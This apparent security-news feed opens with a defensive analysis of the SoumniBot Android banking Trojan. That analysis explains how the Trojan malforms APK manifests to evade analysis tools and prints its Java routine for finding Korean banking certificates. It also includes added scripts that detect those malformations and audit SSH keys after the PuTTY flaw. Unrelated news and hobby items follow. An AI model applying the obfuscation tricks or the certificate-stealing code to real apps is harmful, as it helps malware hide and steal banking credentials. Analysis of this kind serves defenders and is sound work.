Any APK file is a ZIP archive with AndroidManifest.xml in the root folder. This file contains information about the declared components, permissions and other app data, and helps the operating system to retrieve information about various app entry points. Just like the operating system, the analyst starts by inspecting the manifest to find the entry points, which is where code analysis should start. This is likely what motivated the developers of SoumniBot to research the implementation of the manifest parsing and extraction routine, where they found several interesting opportunities to obfuscate APKs.

Technique 1: Invalid Compression method value


This is a relatively well-known technique used by various types of malware including SoumniBot and associated with the way manifests are unpacked. In the libziparchive library, the standard unarchiving function permits only two Compression method values in the record header: 0x0000 (STORED, that is uncompressed) and 0x0008 (DEFLATED, that is compressed with deflate from the zlib library), or else it returns an error.

libziparchive unarchiving algorithm

Yet, instead of using this function, the developers of Android chose to implement an alternate scenario, where the value of the Compression method field is validated incorrectly.

Manifest extraction procedure

If the APK parser comes across any Compression method value but 0x0008 (DEFLATED) in the APK for the AndroidManifest.xml entry, it considers the data uncompressed. This allows app developers to put any value except 8 into Compression method and write uncompressed data. Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed. The image below illustrates the way the technique is executed in the file b456430b4ed0879271e6164a7c0e4f6e.

Invalid Compression method value followed by uncompressed data

Technique 2: Invalid manifest size


Let’s use the file 0318b7b906e9a34427bf6bbcf64b6fc8 as an example to review the essence of this technique. The header of AndroidManifest.xml entry inside the ZIP archive states the size of the manifest file. If the entry is stored uncompressed, it will be copied from the archive unchanged, even if its size is stated incorrectly. The manifest parser ignores any overlay, that is information following the payload that’s unrelated to the manifest. The malware takes advantage of this: the size of the archived manifest stated in it exceeds its actual size, which results in overlay, with some of the archive content being added to the unpacked manifest. Stricter manifest parsers wouldn’t be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors.

The stated size of the manifest is much larger than its actual size

Note that although live devices interpret these files as valid, apkanalyzer, Google’s own official utility for analyzing assembled APKs, cannot handle them. We have notified Google accordingly.
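The two header checks that a stricter unpacker would apply to the manifest entry (Techniques 1 and 2) can be run over the raw APK bytes before any analysis tool touches the file. This is an added Python example, not code from the original report: `central_entries`, `check_manifest`, `build_sample` and `patch_manifest_header` are hypothetical names, the sample archive is constructed inline with placeholder content, and ZIP64 archives are not handled.

```python
import io
import struct
import zipfile

MANIFEST = "AndroidManifest.xml"
VALID_METHODS = (0x0000, 0x0008)  # STORED, DEFLATED


def central_entries(data):
    """Parse the ZIP central directory; return (cd_offset, entries)."""
    eocd = data.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("end-of-central-directory record not found")
    total, _cd_size, cd_off = struct.unpack_from("<HII", data, eocd + 10)
    entries, pos = [], cd_off
    for _ in range(total):
        if data[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("bad central directory header")
        method, = struct.unpack_from("<H", data, pos + 10)
        csize, = struct.unpack_from("<I", data, pos + 20)
        nlen, elen, clen = struct.unpack_from("<HHH", data, pos + 28)
        lfh, = struct.unpack_from("<I", data, pos + 42)
        name = data[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        entries.append(dict(name=name, method=method, csize=csize,
                            lfh=lfh, cdh=pos))
        pos += 46 + nlen + elen + clen
    return cd_off, entries


def check_manifest(data):
    """Return a list of findings for the AndroidManifest.xml entry."""
    cd_off, entries = central_entries(data)
    manifests = [e for e in entries if e["name"] == MANIFEST]
    if not manifests:
        return ["manifest-missing"]
    findings = []
    for e in manifests:
        lfh = e["lfh"]
        if data[lfh:lfh + 4] != b"PK\x03\x04":
            findings.append("bad-local-header")
            continue
        lfh_method, = struct.unpack_from("<H", data, lfh + 8)
        nlen, elen = struct.unpack_from("<HH", data, lfh + 26)
        # Technique 1: anything other than STORED/DEFLATED, in either header.
        for m in sorted({e["method"], lfh_method}):
            if m not in VALID_METHODS:
                findings.append("invalid-compression-method:0x%04x" % m)
        # Technique 2: the declared size must fit before the next ZIP
        # structure (next local header, or the central directory).
        data_start = lfh + 30 + nlen + elen
        next_struct = min([o["lfh"] for o in entries if o["lfh"] > lfh]
                          + [cd_off])
        if data_start + e["csize"] > next_struct:
            findings.append("declared-size-overruns-entry")
    return findings


def build_sample():
    """Constructed two-entry archive with placeholder bytes (not a real APK)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        z.writestr(MANIFEST, b"\x03\x00\x08\x00" + b"M" * 60)
        z.writestr("classes.dex", b"D" * 120)
    return buf.getvalue()


def patch_manifest_header(data, method=None, size=None):
    """Test fixture: overwrite the manifest entry's header fields in place."""
    buf = bytearray(data)
    for e in central_entries(data)[1]:
        if e["name"] != MANIFEST:
            continue
        if method is not None:
            struct.pack_into("<H", buf, e["lfh"] + 8, method)
            struct.pack_into("<H", buf, e["cdh"] + 10, method)
        if size is not None:
            struct.pack_into("<II", buf, e["lfh"] + 18, size, size)
            struct.pack_into("<II", buf, e["cdh"] + 20, size, size)
    return bytes(buf)


if __name__ == "__main__":
    clean = build_sample()
    for label, blob in [("clean", clean),
                        ("bad method", patch_manifest_header(clean, method=0x4B5A)),
                        ("oversized", patch_manifest_header(clean, size=264))]:
        print(label, check_manifest(blob))
```

Any finding is a reason to treat the APK as suspicious and to extract the manifest with a parser that tolerates the same malformations as the device, rather than trusting a tool that fails on the file.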

Technique 3: Long namespace names


The SoumniBot malware family, for example the file fa8b1592c9cda268d8affb6bceb7a120, has used this technique as well. The manifest contains very long strings, used as the names of XML namespaces.

Very long strings in the manifest…

…used as namespace names

Manifests that contain strings like these become unreadable for both humans and programs, and the latter may not be able to allocate enough memory to process them. The manifest parser in the OS itself completely ignores namespaces, so the manifest is handled without errors.

What’s under the obfuscation: SoumniBot’s functionality


When started, the application requests a configuration with two parameters, mainsite and mqtt, from the server, whose address is a hardcoded constant.

Parameter request

Both parameters are server addresses, which the malware needs for proper functioning. The mainsite server receives collected data, and mqtt provides MQTT messaging functionality for receiving commands. If the source server did not provide these parameters for some reason, the application will use the default addresses, also stored in the code.

After requesting the parameters, the application starts a malicious service. If it cannot start or stops for some reason, a new attempt is made every 16 minutes. When run for the first time, the Trojan hides the app icon to complicate removal, and then starts to upload data in the background from the victim’s device to mainsite every 15 seconds. The data includes the IP address, country deduced from that, contact and account lists, SMS and MMS messages, and the victim’s ID generated with the help of the trustdevice-android library. The Trojan also subscribes to messages from the MQTT server to receive the commands described below.

| # | Description | Parameters |
|---|---|---|
| 0 | Sends information about the infected device: phone number, carrier, etc., and the Trojan version, followed by all of the victim’s SMS messages, contacts, accounts, photos, videos and online banking digital certificates. | – |
| 1 | Sends the victim’s contact list. | – |
| 2 | Deletes a contact on the victim’s device. | data: the name of the contact to delete |
| 3 | Sends the victim’s SMS and MMS messages. | – |
| 4 | A debugging command likely to be replaced with sending call logs in a new version. | – |
| 5 | Sends the victim’s photos and videos. | – |
| 8 | Sends an SMS message. | data: ID that the malware uses to receive a message to forward. The Trojan sends the ID to mainsite and gets message text in return. |
| 24 | Sends a list of installed apps. | – |
| 30 | Adds a new contact on the device. | name: contact name; phoneNum: phone number |
| 41 | Gets ringtone volume levels. | – |
| 42 | Turns silent mode on or off. | data: a flag set to 1 to turn on silent mode and to 0 to turn it off |
| 99 | Sends a pong message in response to an MQTT ping request. | – |
| 100 | Turns on debug mode. | – |
| 101 | Turns off debug mode. | – |

The command with the number 0 is worth special mention. It searches, among other things, external storage media for .key and .der files that contain paths to /NPKI/yessign.

    public static List getAllBankingKeys(Context context) {
        List list = new ArrayList();
        // query external storage for files whose path ends in .key or .der
        Cursor cursor = context.getContentResolver().query(MediaStore.Files.getContentUri("external"),
                new String[]{"_id", "mime_type", "_size", "date_modified", "_data"},
                "(_data LIKE \'%.key\' OR _data LIKE \'%.der\')", null, null);
        int index = cursor == null ? 0 : cursor.getColumnIndexOrThrow("_data");
        if (cursor != null) {
            while (cursor.moveToNext()) {
                String s = cursor.getString(index);
                // keep only paths that contain /NPKI/yessign
                if (!s.contains("/NPKI/yessign")) {
                    continue;
                }
                Logger.log("path is:" + s);
                list.add(s);
                break;
            }
            cursor.close();
        }
        return list;
    }

If the application finds files like that, it copies the directory where they are located into a ZIP archive and sends it to the C&C server. These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions. This technique is quite uncommon for Android banking malware. Kaspersky security solutions detect SoumniBot despite its sophisticated obfuscation techniques, and assign to it the verdict of Trojan-Banker.AndroidOS.SoumniBot.

Conclusion


Malware creators seek to maximize the number of devices they infect without being noticed. This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code.

We have detailed the techniques used by this Trojan, so that researchers around the world are aware of the tactics, which other types of malware might borrow in the future. Besides the unconventional obfuscation, SoumniBot is notable for stealing Korean online banking keys, which we rarely observe in Android bankers. This feature lets malicious actors empty unwitting victims’ wallets and circumvent authentication methods used by banks. To avoid becoming a victim of malware like that, we recommend using a reliable security solution on your smartphone to detect the Trojan and prevent it from being installed despite all its tricks.

Indicators of compromise


MD5
0318b7b906e9a34427bf6bbcf64b6fc8
00aa9900205771b8c9e7927153b77cf2
b456430b4ed0879271e6164a7c0e4f6e
fa8b1592c9cda268d8affb6bceb7a120

C&C
https[://]google.kt9[.]site
https[://]dbdb.addea.workers[.]dev


https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/


85.7% increase in the ransomware phenomenon in Italy, reports the Assintel Cyber Think Tank
https://poliverso.org/display/0477a01e-6b35ef2d-1994e0cdcb8e3306

The annual report on the state of health of cyber security, published by the Assintel Cyber Think Tank (https://www.assintel.it/sala-stampa-2/cyber-report-nel-2023-184-di-cyber-attacchi-nel-mondo-il-61-viene-dal-dark-web/), highlights a worrying increase in cyber attacks during 2023. The data collected indicate a notable 184% increase in the number of attacks compared with the previous year, with a total of 7,068 identified and classified during the year.

It is worth noting that 61% of these attacks come exclusively from the Dark Web, underlining the need to monitor unconventional sources. Seasonal analysis of the attacks revealed a peak in spring, with April recording the highest number of offensives, followed by March, November, July and June. January and February, by contrast, showed less criminal activity. Cybercrime was the main threat, accounting for 93% of total attacks in 2023. Although the categories linked to espionage and information warfare appear to be declining, hacktivism increased slightly.

Sectors such as manufacturing, professional/scientific/technical, ICT, healthcare and finance/insurance were among the hardest hit by the attacks. In addition, there was a significant increase in attacks against the American continent, which accounted for 50% of total attacks in 2023, followed by Europe, Asia and Africa. The techniques most used by attackers include malware, which accounted for 70% of all attacks, followed by the use of vulnerabilities and unknown techniques. About a quarter of the attacks had critical impacts, while 67% caused serious impacts, indicating an increase in attacks with catastrophic economic, legal or reputational consequences for the victims. The Assintel Cyber Think Tank stressed the urgent need to strengthen cyber security measures and to promote public-private collaboration in order to counter this growing threat to digital security effectively.

Ransomware remains a significant threat. In the first quarter of 2023 there was a significant increase in attacks aimed at data theft and ransom demands. Ransomware gangs caused serious economic and reputational damage, with a 19% increase in the number of victims compared with the previous quarter. In particular, Italy saw an 85.7% increase in victims compared with the fourth quarter of 2022.

In the second quarter of 2023, the number of victims of ransomware attacks rose by 62% compared with the previous quarter, with SMEs representing 80% of the victims. Service companies were the hardest hit by ransomware gangs, with 47% of the victims. Alongside ransomware attacks, phishing continued to pose a significant threat to cyber security throughout 2023, with attackers using increasingly sophisticated methods to obtain sensitive information.

In the second half of 2023 the trend in ransomware attacks continued, with a total of 2,616 victims recorded in 94 different countries. Ransomware gangs remained active, with a total of 52 groups identified. The United States was the most affected country, followed by the United Kingdom, Canada, Germany and Italy.

Pierguido Iezzi, CEO of Swascan (Tinexta Cyber) and coordinator of the Assintel Cyber Think Tank, stressed the growing vulnerability of companies of all sizes and the importance of adopting a holistic approach to cyber defence that includes preventive and proactive measures. In an increasingly complex and threatening landscape for SMEs, the role of associations in the cyber security sector becomes crucial. The Assintel Cyber Think Tank is therefore committed to providing more effective support to SMEs in the field of cyber security, expanding and consolidating the ecosystem of Assintel Cyber Companies.

It also offers valuable support to SMEs in managing cyber risks, from technology to legal compliance, keeping them constantly up to date on new regulations and on the technologies available to improve their cyber security. These words are echoed by the President of Assintel, Paola Generali: “Associations are a crucial competitive lever for SMEs, allowing them to share knowledge and resources and to make common cause against the cross-cutting challenges that affect them. In addition, associations play a fundamental role in representing the interests of SMEs at institutional level and in interacting with the competent authorities.”

In a context in which cybersecurity is becoming ever more crucial, collective commitment becomes essential to guarantee the security of data and digital infrastructure.

The article “85.7% increase in the ransomware phenomenon in Italy, reports the Assintel Cyber Think Tank” comes from il blog della sicurezza informatica.


A ROG Ally Battery Mod You Ought To Try
https://poliverso.org/display/0477a01e-23cd4fd1-a6a7e01e31020270
The mod as installed into the handheld, complete with the custom 3D-printed back, with a screwdriver being used to install one of the screws

Today’s hack is an unexpected but appreciated contribution from members of the iFixit crew, published by [Shahram Mokhtari]. This is a mod for the ROG Ally, the Asus-produced handheld gaming console, that has you upgrade the battery (https://www.ifixit.com/Guide/Asus+ROG+Ally+Battery+Mod/170236) to an aftermarket battery from an Asus laptop to double your battery life (40 Wh to 88 Wh).

There are two main things you need to do: replace the back cover with a 3D printed version that accommodates the new battery, and move the battery wires into the shell of an old connector. No soldering or crimping needed — just take the wires out of the old connector, one by one, and put them into a new connector. Once that is done and you reassemble your handheld, everything just works; the battery is recognized by the OS, can be charged, runs the handheld wonderfully all the same, and the only downside is that your ROG Ally becomes a bit thicker.

The best part is, it’s hard to fail at applying this mod, as it’s documented to the high standards we’d expect from iFixit. The entire journey is split into detailed steps, there’s no shortage of pictures, and the group has also added warnings for the few potentially problematic aspects you want to watch out for. Plus, in the comment section, we’ve learned that there’s an entire community called AllyMods dedicated to ROG Ally modding that has spawned creations like the dual display mod, which is a joy to see!

This mod reminds us of the time someone modified a Nintendo Game Boy Advance SP with a thicker shell too, not just extending the battery, but also adding things like Bluetooth and 3.5 mm audio, USB-C and wireless charging. A worthy upgrade for a beloved device!


1/3 48 civil society orgs & 26 individual experts call on Member States representatives to ❌REJECT @eu2024be's latest #CSAR compromise.

The text is flawed & harmful. It will enable #MassSurveillance & undermine #encryption.

Read more: https://edri.org/our-work/open-letter-mass-surveillance-and-undermining-encryption-still-on-table-in-eu-council

in reply to EDRi

2/3 The latest Council #CSAR proposal:

allows #DetectionOrders to be issued very broadly - ignoring EU Council Legal Service's concerns that this is 🙅🏿 NOT compatible with human rights law prohibiting general monitoring.

Chances are @EUCourtPress would annul #DetectionOrders.🚫

in reply to EDRi

3/3 This year, the European Court of Human Rights ruled that weakening encryption violates #FundamentalRights.

The Council's latest #CSAR texts ignore the ruling, keep #CSS on the table & don’t stop providers from being forced to weaken #encryption.

tl;dr⚖️The Council's falling foul of the law.

in reply to EDRi

@torproject @epicenter_works
@d3

There are too many hits for @informatik. Did you mean the Gesellschaft für Informatik ~ Berufsverband der Informatiktreibenden?

in reply to EDRi

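We have published a Japanese translation. JCA-NET has also become a signatory to this statement.
Under the pretext of "child sexual abuse (#CSA) regulation", moves are under way in the EU to give investigative agencies large-scale surveillance and to weaken encryption, and this could spread to countries around the world.

(Joint statement) The issue of mass surveillance (#大量監視) and the weakening of encryption (#暗号化) is still on the table at the EU Council (#EU理事会).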
https://www.jca.apc.org/jca-net/ja/node/350




PuTTY developers warn of a serious security flaw. Keys are compromised
https://poliverso.org/display/0477a01e-cf14cc65-d2d6f2b62e3fc6b9

The PuTTY developers warn (https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-p521-bias.html) of a critical vulnerability affecting versions 0.68 through 0.80. The flaw could allow an attacker to fully recover NIST-P521 private keys.

The vulnerability, CVE-2024-31497, arises from errors in the generation of ECDSA cryptographic nonces, which make it possible to recover private keys. Discovery of the bug is credited to researchers Fabian Bäumer and Markus Brinkmann of Ruhr University Bochum.

The first 9 bits of each ECDSA nonce are zero, allowing full recovery of the private key from about 60 signatures using state-of-the-art techniques.

An attacker who holds a few dozen signed messages and the public key has enough data to recover the private key and forge signatures, which can lead to unauthorized access to the servers and services that use that key.

The problem also affected other products that bundle vulnerable versions of PuTTY:

  • FileZilla (3.24.1 – 3.66.5);
  • WinSCP (5.9.5 – 6.3.2);
  • TortoiseGit (2.4.0.2 – 2.15.0);
  • TortoiseSVN (1.10.0 – 1.14.6).

Following responsible disclosure, the issue was fixed in the new versions PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 and TortoiseGit 2.15.0.1.

The product's developers switched to the RFC 6979 technique for all DSA and ECDSA key types, abandoning the previous method. TortoiseSVN users are advised to use Plink from the latest PuTTY release, 0.81, when accessing SVN repositories over SSH until the update is released.

ECDSA NIST-P521 keys used with any of the affected components must be considered compromised and immediately revoked by removing them from "~/.ssh/authorized_keys" and similar files on other SSH servers.

The article "PuTTY developers warn of a serious security flaw. Keys are compromised" comes from il blog della sicurezza informatica.
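One way to support the revocation step above, as an added example (not code from the article or from the PuTTY project): a small audit that lists every `ecdsa-sha2-nistp521` entry in `authorized_keys` content, checking both the declared key type and the type stored inside the base64 blob. The function names and the sample file are assumptions made for illustration, and the sample key blobs are constructed placeholders; the script cannot tell which keys were actually used with an affected client, so its output is a review list.

```python
"""Audit authorized_keys content for ecdsa-sha2-nistp521 entries (added example)."""
import base64
import struct
import sys

P521 = "ecdsa-sha2-nistp521"
# Key-type names that can open the key part of an authorized_keys line.
KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", P521,
}


def split_fields(line):
    """Split on whitespace, but keep quoted option values (command="a b") whole."""
    fields, cur, in_quotes, escaped = [], "", False, False
    for ch in line:
        if escaped:
            cur, escaped = cur + ch, False
        elif ch == "\\" and in_quotes:
            cur, escaped = cur + ch, True
        elif ch == '"':
            cur, in_quotes = cur + ch, not in_quotes
        elif ch in " \t" and not in_quotes:
            if cur:
                fields.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        fields.append(cur)
    return fields


def blob_key_type(b64):
    """Return the key type stored inside the base64 blob, or None if malformed.

    SSH public key blobs start with a uint32 length followed by the type name.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    if len(raw) < 4:
        return None
    (n,) = struct.unpack(">I", raw[:4])
    if n > len(raw) - 4:
        return None
    return raw[4:4 + n].decode("ascii", "replace")


def find_p521_keys(text):
    """Return one dict per entry whose declared or embedded type is P-521."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = split_fields(line)
        # The key type is field 0, or field 1 when an options field comes first.
        idx = next((i for i in range(min(2, len(fields) - 1))
                    if fields[i] in KEY_TYPES), None)
        if idx is None:
            continue
        declared, actual = fields[idx], blob_key_type(fields[idx + 1])
        if P521 in (declared, actual):
            hits.append({"line": lineno, "declared": declared,
                         "blob_type": actual,
                         "comment": " ".join(fields[idx + 2:])})
    return hits


def sample_blob(key_type):
    """Constructed placeholder blob: real type header, dummy key material."""
    name = key_type.encode()
    return base64.b64encode(struct.pack(">I", len(name)) + name + bytes(40)).decode()


# Constructed sample file; users, hosts and key material are made up.
SAMPLE = "\n".join([
    "# constructed authorized_keys sample",
    "ssh-ed25519 %s alice@laptop" % sample_blob("ssh-ed25519"),
    "%s %s bob@winscp-host" % (P521, sample_blob(P521)),
    'command="/usr/bin/rsync --server",no-pty %s %s backup job' % (P521, sample_blob(P521)),
    "ecdsa-sha2-nistp256 %s carol@desk" % sample_blob("ecdsa-sha2-nistp256"),
    "ssh-rsa %s mislabelled" % sample_blob(P521),
])

if __name__ == "__main__":
    # With no arguments, audit the constructed sample; otherwise the given files.
    sources = sys.argv[1:] or [None]
    for path in sources:
        text = SAMPLE if path is None else open(path, encoding="utf-8", errors="replace").read()
        for hit in find_p521_keys(text):
            print(path or "<sample>", hit)
```

Run it with one or more `authorized_keys` paths as arguments; each reported line number is an entry to review against the list of affected clients before removal.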




The Future of Work According to Elon Musk: Technological Revolution or Social Chaos?
https://poliverso.org/display/0477a01e-dc567021-141c1334426099db

Elon Musk's latest prediction about the future of work seems equal parts utopian and somewhat terrifying. Speaking at an artificial intelligence summit in November 2023, the eccentric billionaire said that advanced AI will eventually be able to "do everything" when it comes to work and employment.

"There will come a point where no job is needed," he told British Prime Minister Rishi Sunak. "You can have a job if you want one for personal satisfaction, but AI will be able to do everything."

For anyone whose identity and livelihood are tied to their career, that could be a hard pill to swallow. While Musk predicts that AI will make human work optional rather than necessary for survival, he insists that this automation of the workforce will usher in what he calls "an age of abundance".

The idea is that hyper-intelligent AI systems will act as all-knowing "magic genies", providing all the goods, services and education we might need or want. No more shortages, just plenty for everyone without having to work.

To offset the employment crisis, Musk is pushing something called "universal high income". Unlike basic minimum income schemes, this would give everyone more generous and dignified financial support, no questions asked. "It will be a sort of equalizer," he said.

It sounds idyllic in theory. But of course not everyone shares his view. Experts such as Julia Hobsbawm are sounding the alarm. "I'm afraid Mr Musk is an unrealistic utopian," she told GOBankingRates. "Like many in the tech world, he argues that replacing humans in the workplace is inevitable and desirable. It absolutely is not."

Hobsbawm argues that the focus should be on properly training workers to collaborate with AI systems, not simply handing them a cheque while the robots take over. "Work matters in our lives," she insists.

So is Musk's "age of abundance" a genuine glimpse of an AI-powered future in which no one will have to work? Or are we heading towards mass unemployment and social collapse? Other experts, such as Alexandra Levit, author of "Humanity Works", take a more measured view.

"I think he's right… in a sense," Levit said. "We will probably have some form of basic income, and AI will automate part of the jobs. But it won't happen overnight or in as extreme a way as Musk suggests."

Levit expects that, although AI will have an enormous impact on every sector, it will also create new job opportunities that we cannot yet imagine. "I believe enough new roles will emerge that humans will not stop working altogether."

The article "The Future of Work According to Elon Musk: Technological Revolution or Social Chaos?" comes from il blog della sicurezza informatica.




Letta to recommend creation of EU Deep Tech Stock Exchange
https://poliverso.org/display/0477a01e-ce545f15-98f9afbb93900e8d


Europe's stock markets are plagued by problems that prevent deep tech startups from getting the funding they need, Letta wrote.


https://www.euractiv.com/section/digital/news/letta-to-recommend-creation-of-eu-deep-tech-stock-exchange/




OpenJS in the crosshairs. New XZ Utils-style backdoor foiled
https://poliverso.org/display/0477a01e-f15ef81e-7f26abeecebce221

Cybersecurity experts recently foiled (https://openjsf.org/blog/openssf-openjs-alert-social-engineering-takeovers) an attempt to hack a project on the OpenJS platform, which in broad terms closely resembles the recent backdoor incident in the XZ Utils compression utility.

On Monday 15 April the OpenJS Foundation, a non-profit organization that oversees JavaScript projects used by billions of sites worldwide, received a series of suspicious emails. The senders asked for one of its popular projects to be updated urgently to fix critical vulnerabilities, without giving any details.

Robin Bender Ginn of OpenJS and Omkar Arasaratnam of the Open Source Security Foundation reported that the authors of the emails insisted on being appointed as new maintainers of a popular project (name omitted), despite having no previous experience of working on it.

The experts noted the similarity of these methods to the actions of the hacker known as Jia Tan, whom we wrote about recently. It was Jia Tan, an identity that may have concealed an entire team of experienced hackers, who had previously managed to introduce a backdoor into the XZ Utils utility.

Ginn and Arasaratnam stressed that none of those who applied were granted privileged access to the project, because the experts immediately suspected that something was wrong.

According to Chris Hughes of Endor Labs, about a quarter of all cybersecurity projects have one maintainer and 94% of projects have fewer than ten. He observed that the open source software ecosystem is extremely heterogeneous and is vulnerable because of its global dependence on anonymous developers.

CISA officials Jack Cable and Aeva Black voiced the need to rethink approaches to security in technology production. They argue that companies using open source software should contribute to the sustainability of the ecosystem, whether financially or through developer time.

Arasaratnam also announced the Linux Foundation's plans to develop specific guidelines for project maintainers who may face aggressive takeover attempts. He further stressed the importance of supporting maintainers in the fight against social engineering and manipulation, which can potentially lead to very serious consequences.

The article "OpenJS in the crosshairs. New XZ Utils-style backdoor foiled" comes from il blog della sicurezza informatica.




The EU Must Seize its Opportunity to Inspire, Not Regulate, Innovation [Promoted content]
https://poliverso.org/display/0477a01e-27317787-4ad5bace1acec6ba


New leadership must determine which policies can help Europe balance sustainability and competitiveness by reaping the benefits of innovation at a time of acute global challenges. The next mandate must ensure technology-driven businesses can thrive in Europe while upholding the Union's fundamental values.


https://www.euractiv.com/section/digital/opinion/the-eu-must-seize-its-opportunity-to-inspire-not-regulate-innovation/




The mysterious Chinese site hiding dangerous malware. Our investigation
https://poliverso.org/display/0477a01e-32042825-e7f4fd20f5215ecb

During my usual proactive CTI and OSINT activities this afternoon, I came across a strange Chinese-language site that in fact appears to distribute malware.

At first glance the site looks like a place to download the popular messaging app Telegram, which is blocked by the government in China. Clicking on Windows downloads a 118MB .zip archive identifiable by the following hash:

2b71ecbaad633e07610d4fe45db03062920a44527f3f69d71efb54c571f5b643 – SHA256

Opening the archive, we find a 120MB file named "Taxsex64-2.msi", identifiable by the following hash:

76e9ed21024fd3181f47cbb7870db620ed43dd01c8c77fbcbc3b8eaf47924045 – SHA256

At this point I checked the domain using the well-known ThreatYeti service.

[Image caption: The domain in question received a score of 9.08, which is obviously very high]

Using VirusTotal and other online tools to hunt for the malware


After these initial checks, all that remained was to upload the two files, both the .zip archive and the .msi file, to VirusTotal.

[Image caption: These are the details of the result for the .zip file. As we can see, the "First Submission" is ours, which means that we were the first in the world to upload this archive to VirusTotal and that the result is now available to the community]

[Image caption: For the .msi file too we were the first to upload it, and the results, especially those in the "Behavior" section covering analysis of the file in dedicated sandboxes, are now available to the whole community]

As a further check, we also uploaded the .msi file to Jotti's malware scanner.

[Image caption: As we can see, at 18:24 on 16 April 2024 the file appeared completely clean]

At 23:58 on 16 April 2024, however, something slowly starts to show up…

[Image caption: On the afternoon of 16 April 2024 we submitted the file to Avast using their dedicated online form]

In addition, a quick check with the "Avast Free Antivirus" application gave a positive result.

[Image caption: The malware Win64:TrojanX-gen is now detected in association with the file Taxsex64-2.msi]

Naturally we have shared the file with other antivirus companies (and not only them), and we are waiting, hopeful, for their analyses…

Conclusions


With this short article I wanted to illustrate essentially three things:

  1. The importance of constant research. It is true that in cybersecurity we often play defence, but it is also important to go "hunting", tracking down malware, new APT groups and, where permitted and within the prescribed limits, new vulnerabilities with a view to their full disclosure.
  2. The importance of sharing. Anyone who works in cybersecurity knows that, without shared knowledge and recognition of skills, cybersecurity itself would risk losing the added value that comes from the community's work, which is more and more often indispensable as threats increase and take on transnational characteristics.
  3. The central role, when malware goes undetected, of submitting it to antivirus companies and to third-party companies or bodies actively engaged in malware analysis, so that it can be analysed and, if it proves malicious, the threat can be actively countered (just as happened in the Avast example in this article: at 18:24 the result was negative, while at 23:58 the result is positive).


One last piece of advice…


Let me now give a short piece of advice to those who are just entering this world. If one day you work proactively, looking for sites that distribute malware or deliberately signing your email address up on phishing resources, it may well happen, just as it did today, that you are the first in the world to report that phishing site to the dedicated resources, or that malware to VirusTotal or to the antivirus companies.

And if you do bug hunting, you may find a "0day" vulnerability and be the first to report it to the vendor…

Undoubtedly, in the world of cybersecurity too, being the first to do something, and then knowing that you have actively contributed to improving the community, is a source of joy; but always remember that this too is fully part of that fantastic world you are discovering, which is cybersecurity.

The article "The mysterious Chinese site hiding dangerous malware. Our investigation" comes from il blog della sicurezza informatica.




Cyberpunk Guitar Strap Lights Up with Repurposed PCBs
https://poliverso.org/display/0477a01e-914af55f-9b736f82fc5d6c14

Sometimes, whether we like it or not, ordering PCBs results in extra PCBs lying around, either because of board house minimums, mistakes on either end, or both. What’s to be done with these boards? If you’re Hackaday alum [Jeremy Cook], you make a sound-reactive, light-up guitar strap and rock out in cyberpunk style.

The PCBs in question were left over from [Jeremy]’s JC Pro Macro project, and each have four addressable RGB LEDs on board. These were easy enough to chain together with jumper wires, solder, and a decent amount of hot glue. Here’s a hot tip: you can use compressed air to rapidly cool hot glue if you turn the can upside down. Just don’t spray it on your fingers.

The brains of this operation is an Adafruit Circuit Playground Express, which runs off of a lipstick battery and conveniently brings a microphone to the table. These two are united by a 3D print, which is hot-glued to the guitar strap along with all the boards. In the second video after the break, there’s a bonus easy-to-make version that uses an RGB LED strip in place of the repurposed PCBs. There’s no solder or even hot glue involved.

Want to really light up the night? Print yourself a sound-reactive LED guitar.

https://www.youtube.com/embed/00ZI6rT8ne8?feature=oembed

https://www.youtube.com/embed/qI9JWv_ScBo?feature=oembed




More Microwave Metal Casting
https://poliverso.org/display/0477a01e-2799e1a4-5d52cd6917a7185a

If you think you can’t do investment casting because you don’t have a safe place to melt metal, think again. Metal casting in the kitchen is possible, as demonstrated by this over-the-top bathroom hook repair using a microwave forge.

Now, just because it’s possible doesn’t mean it’s advisable. There are a lot better ways to fix something as mundane as a broken bathroom hook, as [Denny] readily admits in the video below. But he’s been at the whole kitchen forging thing since building his microwave oven forge, which uses a special but easily constructed ceramic heat chamber to hold a silicon carbide crucible. So casting a replacement hook from brass seemed like a nice exercise.

The casting process starts with a 3D-printed model of the missing peg, which gets accessories such as a pouring sprue and a thread-forming screw attached to it with cheese wax. This goes into a 3D-printed mold which is filled with a refractory investment mix of plaster and sand. The green mold is put in an air fryer to dry, then wrapped in aluminum foil to protect it while the PLA is baked out in the microwave. Scrap brass gets its turn in the microwave before being poured into the mold, which is sitting in [Denny]’s vacuum casting rig.

The whole thing is over in seconds, and the results are pretty impressive. The vacuum rig ensures metal fills the mold evenly without voids or gaps. The brass even fills in around the screw, leaving a perfect internal thread. A little polishing and the peg is ready for bathroom duty. Overly complicated? Perhaps, but [Denny] clearly benefits from the practice jobs like this offer, and the look is pretty cool too. Still, we’d probably want to do this in the garage rather than the kitchen.

https://www.youtube.com/embed/hlMfovJ8BvQ?feature=oembed




A former Amazon employee has been sentenced to 3 years in prison for cryptocurrency theft
https://poliverso.org/display/0477a01e-372556e5-3f1f6d635d374458

Former Amazon employee and cybersecurity specialist Shakeeb Ahmed has been sentenced to three years in prison for hacking two cryptocurrency exchanges in 2022, from which he stole more than 12 million dollars.

In addition, after his release, Ahmed, who had previously pleaded guilty, will spend a further three years under supervision by the authorities, will return the stolen 12.3 million dollars and will pay restitution to both affected companies.

